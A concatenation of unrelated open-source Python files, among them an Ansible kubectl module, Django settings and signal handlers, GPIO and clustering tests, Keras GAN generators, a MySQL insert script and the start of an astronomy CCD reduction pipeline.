kube: name=nginx resource=rc state=present
- name: test nginx is stopped
kube: name=nginx resource=rc state=stopped
- name: test nginx is absent
kube: name=nginx resource=rc state=absent
- name: test nginx is present
kube: filename=/tmp/nginx.yml
- name: test nginx and postgresql are present
kube: files=/tmp/nginx.yml,/tmp/postgresql.yml
- name: test nginx and postgresql are present
kube:
files:
- /tmp/nginx.yml
- /tmp/postgresql.yml
"""
class KubeManager(object):
    """Thin wrapper around the ``kubectl`` command line client.

    Builds kubectl argument vectors from the Ansible module parameters and
    runs them through ``module.run_command``.  Every action returns the
    stdout of the kubectl invocation split into lines.

    Refactor note: the filename/resource/name/label argument building was
    previously duplicated verbatim across create/replace and
    delete/exists/stop; it now lives in ``_file_args`` and ``_target_args``.
    """

    def __init__(self, module):
        self.module = module
        # Resolve the kubectl binary: explicit parameter wins, otherwise
        # search the PATH (get_bin_path fails the module if not found).
        self.kubectl = module.params.get('kubectl')
        if self.kubectl is None:
            self.kubectl = module.get_bin_path('kubectl', True)
        self.base_cmd = [self.kubectl]

        if module.params.get('server'):
            self.base_cmd.append('--server=' + module.params.get('server'))

        if module.params.get('log_level'):
            self.base_cmd.append('--v=' + str(module.params.get('log_level')))

        if module.params.get('namespace'):
            self.base_cmd.append('--namespace=' + module.params.get('namespace'))

        self.all = module.params.get('all')
        self.force = module.params.get('force')
        self.name = module.params.get('name')
        self.filename = [f.strip() for f in module.params.get('filename') or []]
        self.resource = module.params.get('resource')
        self.label = module.params.get('label')

    def _execute(self, cmd):
        """Run kubectl with *cmd* appended; fail the module on any error."""
        args = self.base_cmd + cmd
        try:
            rc, out, err = self.module.run_command(args)
            if rc != 0:
                self.module.fail_json(
                    msg='error running kubectl (%s) command (rc=%d), out=\'%s\', err=\'%s\'' % (' '.join(args), rc, out, err))
        except Exception as exc:
            self.module.fail_json(
                msg='error running kubectl (%s) command: %s' % (' '.join(args), str(exc)))
        return out.splitlines()

    def _execute_nofail(self, cmd):
        """Run kubectl with *cmd* appended; return None instead of failing."""
        args = self.base_cmd + cmd
        rc, out, err = self.module.run_command(args)
        if rc != 0:
            return None
        return out.splitlines()

    def _file_args(self, verb):
        """Return the --filename argument, failing if no files were given."""
        if not self.filename:
            self.module.fail_json(msg='filename required to %s' % verb)
        return ['--filename=' + ','.join(self.filename)]

    def _target_args(self, missing_msg, all_flag, ignore_not_found=False):
        """Build the target-selection arguments shared by delete/exists/stop.

        A --filename list takes precedence; otherwise select by resource
        type, optional name, and optional label selector.  *all_flag*
        differs per action ('--all' vs '--all-namespaces'), and
        '--ignore-not-found' is added for destructive actions when force
        is set.
        """
        args = []
        if self.filename:
            args.append('--filename=' + ','.join(self.filename))
        else:
            if not self.resource:
                self.module.fail_json(msg=missing_msg)
            args.append(self.resource)
            if self.name:
                args.append(self.name)
            if self.label:
                args.append('--selector=' + self.label)
            if self.all:
                args.append(all_flag)
            if ignore_not_found and self.force:
                args.append('--ignore-not-found')
        return args

    def create(self, check=True, force=True):
        """Apply the definition file(s), skipping when they already exist."""
        if check and self.exists():
            return []
        cmd = ['apply']
        if force:
            cmd.append('--force')
        cmd.extend(self._file_args('create'))
        return self._execute(cmd)

    def replace(self, force=True):
        """Re-apply the definition file(s) unconditionally."""
        cmd = ['apply']
        if force:
            cmd.append('--force')
        cmd.extend(self._file_args('reload'))
        return self._execute(cmd)

    def delete(self):
        """Delete the targeted resource(s); no-op when absent and not forced."""
        if not self.force and not self.exists():
            return []
        cmd = ['delete'] + self._target_args(
            'resource required to delete without filename', '--all',
            ignore_not_found=True)
        return self._execute(cmd)

    def exists(self):
        """Return True when ``kubectl get`` finds at least one target."""
        cmd = ['get'] + self._target_args(
            'resource required without filename', '--all-namespaces')
        cmd.append('--no-headers')
        result = self._execute_nofail(cmd)
        return bool(result)

    # TODO: This is currently unused, perhaps convert to 'scale' with a replicas param?
    def stop(self):
        """Stop the targeted resource(s); no-op when absent and not forced."""
        if not self.force and not self.exists():
            return []
        cmd = ['stop'] + self._target_args(
            'resource required to stop without filename', '--all',
            ignore_not_found=True)
        return self._execute(cmd)
def main():
    """Entry point: map the requested ``state`` onto a KubeManager action."""
    module = AnsibleModule(
        argument_spec=dict(
            name=dict(),
            filename=dict(type='list', aliases=['files', 'file', 'filenames']),
            namespace=dict(),
            resource=dict(),
            label=dict(),
            server=dict(),
            kubectl=dict(),
            force=dict(default=False, type='bool'),
            all=dict(default=False, type='bool'),
            log_level=dict(default=0, type='int'),
            state=dict(default='present', choices=['present', 'absent', 'latest', 'reloaded', 'stopped']),
        ),
        # Fix: the previous mutually_exclusive=[['filename', 'list']]
        # referenced a parameter named 'list' that does not exist in the
        # argument_spec, so the constraint could never trigger; it has been
        # removed as dead code.
    )

    # NOTE(review): the module always reports changed=False -- kubectl
    # offers no reliable change signal here.  Left as-is so reporting
    # behaviour does not silently change for existing playbooks.
    changed = False

    manager = KubeManager(module)
    state = module.params.get('state')

    if state == 'present':
        result = manager.create(check=False)
    elif state == 'absent':
        result = manager.delete()
    elif state == 'reloaded':
        result = manager.replace()
    elif state == 'stopped':
        result = manager.stop()
    elif state == 'latest':
        # 'latest' re-applies the definition, creating or updating as needed.
        result = manager.replace()
    else:
        module.fail_json(msg='Unrecognized state %s.' % state)

    module.exit_json(changed=changed,
                     msg='success: %s' % (' '.join(result))
                     )
from ansible.module_utils.basic import *  # noqa
# Ansible modules pull in the shared boilerplate with a star-import and
# invoke main() when executed as a script.
if __name__ == '__main__':
    main()
| insequent/kargo | library/kube.py | Python | apache-2.0 | 8,694 | 0.00161 |
'''
Created on 26/09/2014
@author: javgar119
'''
# NOTE(review): `Cluster` is never imported in this module; the consumer
# is expected to supply it in the namespace -- confirm against the test
# harness that loads this data file.
# Two unit-weight clusters one x-unit apart.
cluster_list =([Cluster(set([]), 0, 0, 1, 0),
                Cluster(set([]), 1, 0, 1, 0)])
# Twenty unit-weight clusters evenly spaced along the x axis.
cluster_list2 = ([Cluster(set([]), 0, 0, 1, 0),
                 Cluster(set([]), 1, 0, 1, 0),
                 Cluster(set([]), 2, 0, 1, 0),
                 Cluster(set([]), 3, 0, 1, 0),
                 Cluster(set([]), 4, 0, 1, 0),
                 Cluster(set([]), 5, 0, 1, 0),
                 Cluster(set([]), 6, 0, 1, 0),
                 Cluster(set([]), 7, 0, 1, 0),
                 Cluster(set([]), 8, 0, 1, 0),
                 Cluster(set([]), 9, 0, 1, 0),
                 Cluster(set([]), 10, 0, 1, 0),
                 Cluster(set([]), 11, 0, 1, 0),
                 Cluster(set([]), 12, 0, 1, 0),
                 Cluster(set([]), 13, 0, 1, 0),
                 Cluster(set([]), 14, 0, 1, 0),
                 Cluster(set([]), 15, 0, 1, 0),
                 Cluster(set([]), 16, 0, 1, 0),
                 Cluster(set([]), 17, 0, 1, 0),
                 Cluster(set([]), 18, 0, 1, 0),
                 Cluster(set([]), 19, 0, 1, 0)])
# Expected closest-pair results as (distance, index1, index2) tuples.
expected = set([(1.0, 0, 1)])
expected2 = set([(1.0, 9, 10), (1.0, 2, 3), (1.0, 15, 16),
                 (1.0, 11, 12), (1.0, 13, 14), (1.0, 16, 17),
                 (1.0, 14, 15), (1.0, 12, 13), (1.0, 4, 5),
                 (1.0, 18, 19), (1.0, 3, 4), (1.0, 8, 9),
                 (1.0, 17, 18), (1.0, 6, 7), (1.0, 7, 8),
                 (1.0, 5, 6), (1.0, 10, 11), (1.0, 0, 1), (1.0, 1, 2)])
# Ten scattered unit-weight clusters with float coordinates.
cluster_list3 = ([Cluster(set([]), 90.9548590217, -17.089022585, 1, 0),
                  Cluster(set([]), 90.2536656675, -70.5911544718, 1, 0),
                  Cluster(set([]), -57.5872347006, 99.7124028905, 1, 0),
                  Cluster(set([]), -15.9338519877, 5.91547495626, 1, 0),
                  Cluster(set([]), 19.1869055492, -28.0681513017, 1, 0),
                  Cluster(set([]), -23.0752410653, -42.1353490324, 1, 0),
                  Cluster(set([]), -65.1732261872, 19.675582646, 1, 0),
                  Cluster(set([]), 99.7789872101, -11.2619165604, 1, 0),
                  Cluster(set([]), -43.3699854405, -94.7349852817, 1, 0),
                  Cluster(set([]), 48.2281912402, -53.3441788034, 1, 0)])
expected3 = set([(10.5745166749, 0, 7)]) | JavierGarciaD/Algorithmic_Thinking | src/project_3_test_data.py | Python | gpl-3.0 | 2,503 | 0.003196 |
from rpitc.io import IO
class TestOut:
    """Exercise the Out pin wrapper against the GPIO test fixtures."""

    def test_init_on(self, gpio):
        # Constructing with status=IO.ON must drive the pin high immediately.
        from rpitc.io.out import Out
        pin = Out(7, status=IO.ON)
        assert pin.status == IO.ON
        pin.off()

    def test_set_pin(self, out):
        # set_pin reports the state it was asked to apply.
        assert out.set_pin(IO.ON) == IO.ON

    def test_on(self, out):
        out.on()
        assert out.status == IO.ON

    def test_off(self, out):
        out.off()
        assert out.status == IO.OFF

    def test_toggle(self, out):
        # From a known OFF state, each toggle must flip the status.
        out.off()
        for expected in (IO.ON, IO.OFF):
            out.toggle()
            assert out.status == expected
| stefan-walluhn/RPi.TC | tests/test_out.py | Python | gpl-3.0 | 607 | 0 |
import pytest
import watchmaker
@pytest.fixture
def setup_object():
    """Placeholder fixture; no setup is required yet."""
    pass
def test_main():
    """Sanity-check that the package exposes a usable version string."""
    # Fix: the original asserted `__version__ == __version__`, which can
    # never fail.  Assert something falsifiable instead: the attribute
    # exists and is a non-empty string.
    assert isinstance(watchmaker.__version__, str)
    assert watchmaker.__version__
| MarionTheBull/watchmaker | tests/test_watchmaker.py | Python | apache-2.0 | 209 | 0 |
import os
import threading
import time
from django.conf import settings
from django.db import connections
from django.dispatch import receiver
from django.test.signals import setting_changed
from django.utils import timezone
from django.utils.functional import empty
# Most setting_changed receivers are supposed to be added below,
# except for cases where the receiver is related to a contrib app.
@receiver(setting_changed)
def clear_cache_handlers(**kwargs):
    # Drop the memoized cache backends so the next access rebuilds them
    # from the new CACHES setting.
    if kwargs['setting'] != 'CACHES':
        return
    from django.core.cache import caches
    caches._caches = threading.local()
@receiver(setting_changed)
def update_connections_time_zone(**kwargs):
    """Keep process, cache, and DB-connection time zones in sync with settings."""
    if kwargs['setting'] == 'TIME_ZONE':
        # Reset process time zone (tzset is unavailable on Windows).
        if hasattr(time, 'tzset'):
            if kwargs['value']:
                os.environ['TZ'] = kwargs['value']
            else:
                os.environ.pop('TZ', None)
            time.tzset()
        # Reset local time zone cache
        timezone.get_default_timezone.cache_clear()
    # Reset the database connections' time zone
    if kwargs['setting'] == 'USE_TZ' and settings.TIME_ZONE != 'UTC':
        USE_TZ, TIME_ZONE = kwargs['value'], settings.TIME_ZONE
    elif kwargs['setting'] == 'TIME_ZONE' and not settings.USE_TZ:
        USE_TZ, TIME_ZONE = settings.USE_TZ, kwargs['value']
    else:
        # no need to change the database connections' time zones
        return
    # With USE_TZ the database always works in UTC; otherwise it follows
    # the configured local time zone.
    tz = 'UTC' if USE_TZ else TIME_ZONE
    for conn in connections.all():
        conn.settings_dict['TIME_ZONE'] = tz
        tz_sql = conn.ops.set_time_zone_sql()
        if tz_sql:
            conn.cursor().execute(tz_sql, [tz])
@receiver(setting_changed)
def clear_serializers_cache(**kwargs):
    # Forget the loaded serializer registry; it is rebuilt lazily from
    # SERIALIZATION_MODULES on next use.
    if kwargs['setting'] != 'SERIALIZATION_MODULES':
        return
    from django.core import serializers
    serializers._serializers = {}
@receiver(setting_changed)
def language_changed(**kwargs):
    setting = kwargs['setting']
    if setting not in ('LANGUAGES', 'LANGUAGE_CODE', 'LOCALE_PATHS'):
        return
    # Any of the three settings invalidates the default/active translations.
    from django.utils.translation import trans_real
    trans_real._default = None
    trans_real._active = threading.local()
    # Only LANGUAGES/LOCALE_PATHS also invalidate the loaded catalogs and
    # the language-availability cache.
    if setting in ('LANGUAGES', 'LOCALE_PATHS'):
        trans_real._translations = {}
        trans_real.check_for_language.cache_clear()
@receiver(setting_changed)
def file_storage_changed(**kwargs):
    # Reset the lazily-instantiated default storage when any setting it
    # is built from changes.
    if kwargs['setting'] not in (
        'DEFAULT_FILE_STORAGE',
        'FILE_UPLOAD_DIRECTORY_PERMISSIONS',
        'FILE_UPLOAD_PERMISSIONS',
        'MEDIA_ROOT',
        'MEDIA_URL',
    ):
        return
    from django.core.files.storage import default_storage
    default_storage._wrapped = empty
@receiver(setting_changed)
def root_urlconf_changed(**kwargs):
    # A new ROOT_URLCONF invalidates the resolver caches and the
    # thread-local active urlconf.
    if kwargs['setting'] != 'ROOT_URLCONF':
        return
    from django.core.urlresolvers import clear_url_caches, set_urlconf
    clear_url_caches()
    set_urlconf(None)
@receiver(setting_changed)
def static_storage_changed(**kwargs):
    # Reset the lazily-instantiated staticfiles storage when any of the
    # settings it is built from changes.
    if kwargs['setting'] not in ('STATICFILES_STORAGE', 'STATIC_ROOT', 'STATIC_URL'):
        return
    from django.contrib.staticfiles.storage import staticfiles_storage
    staticfiles_storage._wrapped = empty
| dsanders11/django-future-staticfiles | tests/staticfiles_tests/signals.py | Python | bsd-3-clause | 3,301 | 0 |
# coding:utf-8
"""
Django settings for turbo project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import datetime
import os
import turbosettings.parameters as parameters
from turbosettings.generate_secret_key import secret_key_from_file
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_PATH = os.path.realpath(os.path.dirname(__file__))
USE_X_FORWARDED_HOST = False
FORCE_SCRIPT_NAME = ""
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# The key is read from an untracked file so it never lands in VCS.
SECRET_KEY = secret_key_from_file('secret_key')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty is fine while DEBUG is True; list served hostnames in production.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'songwriter',
    'corsheaders',
    'debug_toolbar',
]
# NOTE: CorsMiddleware is placed before CommonMiddleware, as the
# django-cors-headers docs recommend -- keep this ordering.
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'debug_toolbar.middleware.DebugToolbarMiddleware',
]
ROOT_URLCONF = 'turbosettings.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # Extra template dirs come from the local parameters module.
        'DIRS': parameters.TEMPLATES_DIRS if parameters.TEMPLATES_DIRS else [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'django.template.context_processors.media',
            ],
            'builtins': [
                'django.templatetags.i18n',
                'django.contrib.humanize.templatetags.humanize',
                'django.contrib.staticfiles.templatetags.staticfiles',
            ],
        },
    },
]
WSGI_APPLICATION = 'turbosettings.wsgi.application'
# Front-end dev servers allowed to make cross-origin API calls.
CORS_ORIGIN_WHITELIST = [
    'localhost:8080',
    '127.0.0.1:8080',
]
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
# SQLite file database -- development only.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
# French is the default language; times are stored TZ-aware (USE_TZ).
LANGUAGE_CODE = 'fr'
TIME_ZONE = "Europe/Paris"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Identity marker so translatable strings can be declared here without
# importing Django's translation machinery at settings-load time.
# (Replaces the previous `gettext = lambda x: x`; a named def is the
# idiomatic form -- PEP 8 / E731 -- with identical behavior.)
def gettext(x):
    return x


LANGUAGES = (
    ('fr', gettext('Français')),
    ('en', gettext('English')),
)
# Translation catalogs (.po/.mo) live under <project>/locale/.
LOCALE_PATHS = (
    os.path.join(BASE_DIR, 'locale/'),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = FORCE_SCRIPT_NAME + "/static/"
STATIC_ROOT = BASE_DIR + '/static/'
# Extra static dirs come from the local parameters module, defaulting to
# the in-repo assets/ folder.
STATICFILES_DIRS = parameters.STATICFILES_DIRS if parameters.STATICFILES_DIRS else (
    "assets/",
)
# Directories searched by the test runner / loaddata for fixtures.
# Bug fix: the previous value ('fixtures/') was a parenthesized *string*,
# not a tuple, so Django would iterate it character by character; a
# one-element tuple needs the trailing comma.
FIXTURE_DIRS = (
    'fixtures/',
)
# NOTE(review): MEDIA_URL of '/' serves uploads from the site root, which
# is unusual -- confirm this is intentional before deploying.
MEDIA_URL = '/'
MEDIA_ROOT = BASE_DIR + '/media/'
# DRF: everything requires authentication, via JWT tokens.
REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': (
        'rest_framework.permissions.IsAuthenticated',
    ),
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
    ),
}
# JWT uses its own secret (separate file) and refreshable 5-hour tokens.
JWT_AUTH = {
    'JWT_SECRET_KEY': secret_key_from_file('secret_key_jwt'),
    'JWT_ALLOW_REFRESH': True,
    'JWT_EXPIRATION_DELTA': datetime.timedelta(seconds=18000),
}
# For debug toolbar
INTERNAL_IPS = ["127.0.0.1"]
# Machine-specific overrides load last so they win over everything above.
from turbosettings.settings_local import *
| giliam/turbo-songwriter | backend/turbosettings/settings.py | Python | mit | 4,924 | 0.001422 |
import tensorflow as tf
from tensorflow.python.keras.layers import Conv2D, Conv2DTranspose, Conv3D, Dense, Reshape
# Shorthand for the TF-GAN library bundled in tf.contrib (TensorFlow 1.x).
tfgan = tf.contrib.gan
def basic_generator(noise):
    """Simple generator to produce MNIST images.

    Args:
      noise: A single Tensor representing noise.

    Returns:
      A generated image in the range [-1, 1].
    """
    reshape_channels = 256
    # Project the noise up, then reshape it into a 7x7 spatial map.
    net = Dense(1024, activation='elu')(noise)
    net = Dense(7 * 7 * reshape_channels, activation='elu')(net)
    net = Reshape([7, 7, reshape_channels])(net)
    # Two stride-2 transposed convolutions upsample 7x7 -> 14x14 -> 28x28.
    for filters in (64, 32):
        net = Conv2DTranspose(filters, kernel_size=4, strides=2,
                              padding="same", activation='elu')(net)
    # tanh keeps the generator output in the same range as the real
    # inputs, ie [-1, 1].
    return Conv2D(1, kernel_size=4, activation='tanh', padding='same')(net)
def conditional_generator(inputs):
    """Generator to produce MNIST images conditioned on a class label.

    Args:
      inputs: A 2-tuple of Tensors (noise, one_hot_labels).

    Returns:
      A generated image in the range [-1, 1].
    """
    noise, one_hot_labels = inputs
    channels_after_reshape = 128
    net = Dense(1024, activation='elu')(noise)
    # Mix the class label into the hidden representation via TF-GAN's
    # one-hot conditioning helper.
    net = tfgan.features.condition_tensor_from_onehot(net, one_hot_labels)
    net = Dense(7 * 7 * channels_after_reshape, activation='elu')(net)
    net = Reshape([7, 7, channels_after_reshape])(net)
    # Upsample 7x7 -> 14x14 -> 28x28 with stride-2 transposed convolutions.
    net = Conv2DTranspose(64, kernel_size=4, strides=2, padding="same", activation='elu')(net)
    net = Conv2DTranspose(32, kernel_size=4, strides=2, padding="same", activation='elu')(net)
    # Make sure that generator output is in the same range as `inputs`
    # ie [-1, 1].
    net = Conv2D(1, kernel_size=4, activation = 'tanh', padding='same')(net)
    return net
def encoder_decoder_generator(start_img):
    """Encoder/decoder generator: downsample twice, then upsample back.

    Returns a 3-channel image tensor in [-1, 1] with the same spatial
    size as `start_img`.
    """
    # Encoder: two stride-2 convolutions plus one stride-1 bottleneck.
    net = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(start_img)
    net = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(net)
    net = Conv2D(64, kernel_size=4, strides=1, activation='elu', padding='same')(net)
    # Decoder: two stride-2 transposed convolutions restore the resolution.
    net = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding="same")(net)
    net = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding="same")(net)
    net = Conv2D(64, kernel_size=2, strides=1, activation='elu', padding='same')(net)
    # Make sure that generator output is in the same range as `inputs`
    # ie [-1, 1].
    return Conv2D(3, kernel_size=1, activation='tanh', padding='same')(net)
| bgroveben/python3_machine_learning_projects | learn_kaggle/deep_learning/packages/learntools/gans/generators.py | Python | mit | 2,657 | 0.007151 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Robin Wen
# Date: 2014-11-18
# Desc: Connect to MySQL using MySQLdb package, and insert test data.
import MySQLdb as mdb
# NOTE(review): credentials are hard-coded in source; move them to a
# config file or environment variables before sharing this script.
con = mdb.connect(host='10.10.3.121', user='robin', passwd='robin89@DBA', db='testdb', unix_socket='/tmp/mysql5173.sock', port=5173)

WRITERS = (
    'Jack London',
    'Honore de Balzac',
    'Lion Feuchtwanger',
    'Emile Zola',
    'Truman Capote',
)

# `with con:` wraps the statements in a transaction that is committed on
# success and rolled back on an exception.
with con:
    cur = con.cursor()
    cur.execute("DROP TABLE IF EXISTS Writers")
    cur.execute("CREATE TABLE Writers(Id INT PRIMARY KEY AUTO_INCREMENT, \
        Name VARCHAR(25))")
    # One parameterized executemany replaces five duplicated INSERT
    # literals and lets the driver handle quoting/escaping.
    cur.executemany("INSERT INTO Writers(Name) VALUES(%s)",
                    [(name,) for name in WRITERS])

con.close()
| dbarobin/pytools | py-practice/insert_data.py | Python | gpl-2.0 | 868 | 0.002304 |
#import factorial
#import square
x = int(raw_input("What is 'x'?\n"))
y = int(raw_input("What is y?\n"))
# question0 = str(raw_input("Define a y value? (y/n)\n"))
# if (question0 == "y","Y","yes","Yes"):
# y = int(raw_input("What will 'y' be?\n"))
# elif (y == "n","N","no","No"):
# question2 = str(raw_input("Is y = 10 ok?\n"))
# if (question2 == "y","Y","yes","Yes"):
# y = 10
# elif (question2 == "n","N","no","No"):
# y = int(raw_input("What will 'y' be?\n"))
# else:
# print "Please insert and interger"
# else:
# print "Please insert an interger."
print "Using that information, we can do some mathematical equations."
if x > y: #is not None:
print "x, %d, is greater than y, %d." % (x, y)
elif x == y: #is not None:
print "x, %d, is equal to y, %d." % (x, y)
elif x < y: #is not None:
print "x, %d, is less than y, %d." % (x, y)
elif x is not int:
print "x should be a interger, you put it as %d" % (x)
elif x is None:
print "Please rerun the code."
else:
print "Something went wrong!"
add = (x + y)
sub = (x - y)
mult = (x * y)
div = (x / y)
rem = (x % y)
xeven = (x % 2 == 0)
xodd = (x % 2 != 0)
yeven = (y % 2 == 0)
yodd = (y % 2 != 0)
# xfact = (factorial(x))
# yfact = (factorial(y))
print "If you add x and y, you'll get %s." % add
print "If you subtract x and y, you'll get %s." % sub
print "If you multiply x and y, you'll get %s." % mult
print "If you divide x and y, you'll get %s, with a remainder of %s." % (div, rem)
if (x % 2 == 0):
print "x is even."
if (x % 2 != 0):
print "x is odd."
if (y % 2 == 0):
print "y is even."
if (y % 2 != 0):
print "y is odd."
print "If you square x, you get %s, and y squared is %s." % ((x^2),(y^2))
print "If you cube x, you get %s, and y cubed is %s." % ((x^3), (y^3))
#print "If you take x factorial, you get %s, and y factorial is %s." % ((xfact), (yfact))
#print "The square root of x is %s, and the square root of y is %s." % (square(x), square(y))
print ""
# from sys import argv
# import random
# value = (1,2,3,4,5,6)
# roll, string = argv
# def choice(roll):
# random.choice(dice)
# return choice
# choice(roll)
# dice = choice(value) | chrisortman/CIS-121 | k0459866/Lessons/ex12.py | Python | mit | 2,216 | 0.009928 |
import pygame
import sys
from psistatsrd.app import App
def create_queue_row(data, config):
    """Build a StatRow for one host from its psistats payload.

    `data` must carry 'hostname' and 'ipaddr' (a single address or a
    list of addresses); `config` supplies the widget styling.  The row
    gets a scroller (redrawn every frame) plus cpu and mem graphs
    (updated on poll events).
    """
    mem_graph = create_mem_graph(config)
    cpu_graph = create_cpu_graph(config)

    # Accept either a single address or a list of them.
    # (isinstance replaces the old `type(...).__name__ == "list"` check;
    # the unused `title = []` local was removed.)
    if isinstance(data['ipaddr'], list):
        scroll_text = list(data['ipaddr'])
    else:
        scroll_text = [data['ipaddr']]

    scroller = create_scroller(scroll_text, config)

    row = create_row(config)
    row.host = data['hostname']
    row.add_drawable('scroller', scroller, App.DRAW_EVENT)
    row.add_drawable('cpu', cpu_graph, App.POLL_EVENT)
    row.add_drawable('mem', mem_graph, App.POLL_EVENT)
    return row
def create_row(config):
    """Build an empty StatRow styled from the 'statrow.*' config entries."""
    row = StatRow(
        border_width=int(config['statrow.border_width']),
        border_color=config['statrow.border_color'],
        height=int(config['statrow.height']),
        width=int(config['statrow.width']),
        bgcolor=config['statrow.bgcolor'],
        title_font_size=int(config['statrow.title_font_size']),
        title_font_aa=config['statrow.title_font_aa'],
        title_font=config['statrow.title_font'],
        title_color=config['statrow.title_color'],
    )
    return row
def create_scroller(scroll_text, config):
    """Build a text Scroller cycling through *scroll_text* lines,
    styled from the 'scroller.*' config entries."""
    s = Scroller(
        scroll_speed = float(config['scroller.scroll_speed']),
        scroll_delay = int(config['scroller.scroll_delay']),
        scroll_pause = int(config['scroller.scroll_pause']),
        text_font = config['scroller.font.name'],
        text_aa = config['scroller.font.aa'],
        text_size = int(config['scroller.font.size']),
        width = int(config['scroller.width']),
        height = int(config['scroller.height']),
        color=config['scroller.color'],
        bgcolor=config['scroller.bgcolor'],
        text_lines=scroll_text
    )
    return s
def create_resource_graph(key, config):
    """Build a Graph2 widget from the 'graph.<key>.*' config entries."""
    prefix = 'graph.%s.' % key
    graph = Graph2(
        height=int(config[prefix + 'height']),
        width=int(config[prefix + 'width']),
        line_width=int(config[prefix + 'line_width']),
        color=config[prefix + 'color'],
        bgcolor=config[prefix + 'bgcolor'],
        line_aa=config[prefix + 'line_aa']
    )
    # Optional colour overrides for the max/min markers.
    for attr in ('max_color', 'min_color'):
        option = prefix + attr
        if option in config:
            setattr(graph, attr, config[option])
    return graph
def create_cpu_graph(config):
    # Graph wired to the 'graph.cpu.*' configuration keys.
    return create_resource_graph('cpu', config)
def create_mem_graph(config):
    # Graph wired to the 'graph.mem.*' configuration keys.
    return create_resource_graph('mem', config)
from psistatsrd.app import App
from psistatsrd.graph2 import Graph2
from psistatsrd.scroller import Scroller
from psistatsrd.statrow import StatRow
| alex-dow/psistatsrd | psistatsrd/utils/drawable.py | Python | mit | 2,757 | 0.009068 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# pipeline.py
# AstroObject
#
# Created by Alexander Rudy on 2012-04-25.
# Copyright 2012 Alexander Rudy. All rights reserved.
#
u"""
Basic CCD Reduction Pipeline written with AstroObject
"""
# Python Imports
import shutil
import os
import collections
# Numpy Imports
import numpy as np
# Package Resources Imports
from pkg_resources import resource_filename
# PyRAF Imports
from pyraf import iraf
from iraf import imred, ccdred
from AstroObject.simulator import Simulator
from AstroObject.simulator import (
optional,
description,
include,
replaces,
depends,
excepts,
collect,
ignore,
help
)
from AstroObject.image import ImageStack
from AstroObject.iraftools import UseIRAFTools
from AstroObject.loggers import logging
ImageStack = UseIRAFTools(ImageStack)
class Pipeline(Simulator):
    """A task manager for the RC Pipeline.

    Each public method is a Simulator *stage*; decorators declare stage
    dependencies (``@depends``), help text (``@help``) and membership in the
    ``*all`` macro (``@include``). Stage docstrings double as the progress
    messages shown when a stage runs.
    """
    def __init__(self):
        super(Pipeline, self).__init__(commandLine=True,name="Example Pipeline",version="1.0")
        # Packaged defaults first, then an optional user "Main" config file.
        self.config.load(resource_filename(__name__,"Defaults.yaml"))
        self.config.setFile("Main")
        self.config.load()
        # Register every decorated method below as a pipeline stage.
        self.collect()
    @ignore #Don't load this method as a stage... it is a helper method used to implement other stages.
    def load_type(self,key,stack):
        """Load a specific type of files using a generalized loading procedure.

        Reads every filename listed under ``config[key]["Files"]`` into
        *stack* and returns the accumulated read states; raises IOError when
        the config does not provide a file list.
        """
        if isinstance(self.config[key]["Files"],collections.Sequence):
            ReadStates = []
            for filename in self.config[key]["Files"]:
                ReadStates += stack.read(filename)
                self.log.debug("Loaded %s: %s" % (key,filename))
            return ReadStates
        else:
            self.log.error("No %s files are given." % key)
            raise IOError("No %s files are given." % key)
    def load_bias(self):
        """Loading Raw Bias Frames"""
        # Load individual bias frames.
        self.bias = ImageStack()
        self.load_type("Bias",self.bias)
        # Set Header Values for each image.
        for frame in self.bias.values():
            frame.header.update('IMAGETYP','zero')
            self.log.debug("Set IMAGETYP=zero for frame %s" % frame)
